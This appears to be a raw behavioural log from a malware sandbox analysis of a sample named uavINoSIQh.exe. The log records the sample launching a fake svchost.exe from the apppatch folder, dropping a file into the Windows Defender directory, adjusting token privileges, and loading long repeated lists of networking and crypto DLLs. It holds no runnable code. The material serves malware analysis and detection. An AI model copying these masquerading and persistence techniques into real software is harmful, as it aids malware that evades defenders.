Source: C:\Users\user\Desktop\uavINoSIQh.exe, Code function: 0_2_00401E00 GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,0_2_00401E00
Source: C:\Windows\apppatch\svchost.exe, Code function: 2_2_00401E00 GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,2_2_00401E00
Source: C:\Windows\apppatch\svchost.exe, Code function: 2_2_02665930 GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,2_2_02665930
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, Code function: 5_2_01345930 GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,5_2_01345930
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, Code function: 6_2_01405930 GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,6_2_01405930
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, Code function: 8_2_01535930 #680,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,8_2_01535930
Source: C:\Users\user\Desktop\uavINoSIQh.exe, Code function: 0_2_00401CF0 Sleep,memset,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,GetLastError,SwitchToThread,CreateToolhelp32Snapshot,GetHandleInformation,CloseHandle,Module32First,StrStrIA,Module32Next,StrStrIA,StrStrIA,Module32Next,0_2_00401CF0
Source: C:\Users\user\Desktop\uavINoSIQh.exe, Code function: 0_2_00402680 CoInitializeEx,GetModuleFileNameW,SysAllocString,SysAllocString,SysAllocString,CoCreateInstance,CoCreateInstance,CoCreateInstance,SysFreeString,SysFreeString,SysFreeString,CoUninitialize,0_2_00402680
Source: C:\Windows\apppatch\svchost.exe, File created: C:\Program Files (x86)\Windows Defender\lymyxid.com
Source: C:\Windows\apppatch\svchost.exe, File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\login[1].htm
Source: C:\Windows\apppatch\svchost.exe, Mutant created: \Sessions\1\BaseNamedObjects\75775A6Fa
Source: C:\Windows\SysWOW64\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4084
Source: C:\Windows\apppatch\svchost.exe, Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4628
Source: C:\Windows\SysWOW64\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1756
Source: C:\Windows\SysWOW64\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2604
Source: C:\Windows\SysWOW64\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1812
Source: C:\Windows\SysWOW64\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1900
Source: C:\Windows\SysWOW64\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6304
Source: C:\Users\user\Desktop\uavINoSIQh.exe, File created: C:\Users\user\AppData\Local\Temp\9648.tmp
Source: C:\Users\user\Desktop\uavINoSIQh.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: uavINoSIQh.exe, ReversingLabs: Detection: 84%
Source: uavINoSIQh.exe, String found in binary or memory: -help
Source: svchost.exe, String found in binary or memory: -help
Source: C:\Users\user\Desktop\uavINoSIQh.exe, File read: C:\Users\user\Desktop\uavINoSIQh.exe
Source: unknown, Process created: C:\Users\user\Desktop\uavINoSIQh.exe "C:\Users\user\Desktop\uavINoSIQh.exe"
Source: C:\Users\user\Desktop\uavINoSIQh.exe, Process created: C:\Windows\apppatch\svchost.exe "C:\Windows\apppatch\svchost.exe"
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4084 -s 784
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2604 -s 900
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6304 -s 752
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 820
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1756 -s 780
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1812 -s 3712
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1900 -s 656
Source: C:\Users\user\Desktop\uavINoSIQh.exe, Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\uavINoSIQh.exe, Section loaded: inetcomm.dll
Source: C:\Users\user\Desktop\uavINoSIQh.exe, Section loaded: msoert2.dll
Source: C:\Users\user\Desktop\uavINoSIQh.exe, Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\uavINoSIQh.exe, Section loaded: inetres.dll
Source: C:\Users\user\Desktop\uavINoSIQh.exe, Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\uavINoSIQh.exe, Section loaded: vmhgfs.dll
Source: C:\Users\user\Desktop\uavINoSIQh.exe, Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\uavINoSIQh.exe, Section loaded: samcli.dll
Source: C:\Users\user\Desktop\uavINoSIQh.exe, Section loaded: netutils.dll
Source: C:\Users\user\Desktop\uavINoSIQh.exe, Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\uavINoSIQh.exe, Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\uavINoSIQh.exe, Section loaded: wldp.dll
Source: C:\Users\user\Desktop\uavINoSIQh.exe, Section loaded: mpclient.dll
Source: C:\Users\user\Desktop\uavINoSIQh.exe, Section loaded: version.dll
Source: C:\Users\user\Desktop\uavINoSIQh.exe, Section loaded: profapi.dll
Source: C:\Users\user\Desktop\uavINoSIQh.exe, Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\uavINoSIQh.exe, Section loaded: firewallapi.dll
Source: C:\Users\user\Desktop\uavINoSIQh.exe, Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\uavINoSIQh.exe, Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\uavINoSIQh.exe, Section loaded: fwbase.dll
Source: C:\Users\user\Desktop\uavINoSIQh.exe, Section loaded: fwpolicyiomgr.dll
Source: C:\Users\user\Desktop\uavINoSIQh.exe, Section loaded: ntmarta.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: apphelp.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: inetcomm.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: msoert2.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: oleacc.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: inetres.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: uxtheme.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: vmhgfs.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: netapi32.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: samcli.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: netutils.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: sspicli.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: windows.storage.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: wldp.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: mpclient.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: version.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: profapi.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: kernel.appcore.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: firewallapi.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: dnsapi.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: iphlpapi.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: fwbase.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: winscard.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: devobj.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: sensapi.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: iphlpapi.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: dbghelp.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: dnsapi.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: wininet.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: ntmarta.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: iertutil.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: winhttp.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: mswsock.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: winnsi.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: rasadhlp.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: fwpuclnt.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: urlmon.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: srvcli.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: schannel.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: mskeyprotect.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: ntasn1.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: msasn1.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: dpapi.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: cryptsp.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: rsaenh.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: cryptbase.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: gpapi.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: ncrypt.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: ncryptsslp.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: napinsp.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: pnrpnsp.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: wshbth.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: nlaapi.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: winrnr.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: winsta.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: symsrv.dll
Source: C:\Windows\apppatch\svchost.exe, Section loaded: samlib.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, Section loaded: winscard.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, Section loaded: devobj.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, Section loaded: sensapi.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, Section loaded: dbghelp.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, Section loaded: netapi32.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, Section loaded: samcli.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, Section loaded: netutils.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, Section loaded: wininet.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, Section loaded: wldp.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, Section loaded: sspicli.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, Section loaded: iertutil.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, Section loaded: profapi.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, Section loaded: winhttp.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, Section loaded: mswsock.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, Section loaded: winnsi.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, Section loaded: urlmon.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, Section loaded: srvcli.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: iertutil.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: profapi.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: winhttp.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: mswsock.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: winnsi.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: rasadhlp.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: winscard.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: devobj.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: sensapi.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: iphlpapi.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: dbghelp.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: netapi32.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: samcli.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: netutils.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: dnsapi.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: wininet.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: windows.storage.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: wldp.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: sspicli.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: iertutil.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: profapi.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: winhttp.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: mswsock.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: winnsi.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: rasadhlp.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: urlmon.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: srvcli.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: winscard.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: devobj.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: sensapi.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: iphlpapi.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: dbghelp.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: netapi32.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: samcli.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: netutils.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: dnsapi.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: wininet.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: windows.storage.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: wldp.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: sspicli.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: iertutil.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: profapi.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: ondemandconnroutehelper.dll
